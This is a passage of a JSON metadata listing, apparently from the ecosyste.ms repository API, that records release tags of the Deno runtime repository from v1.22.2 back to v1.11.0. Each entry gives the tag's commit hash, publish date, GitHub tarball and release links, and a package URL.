tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha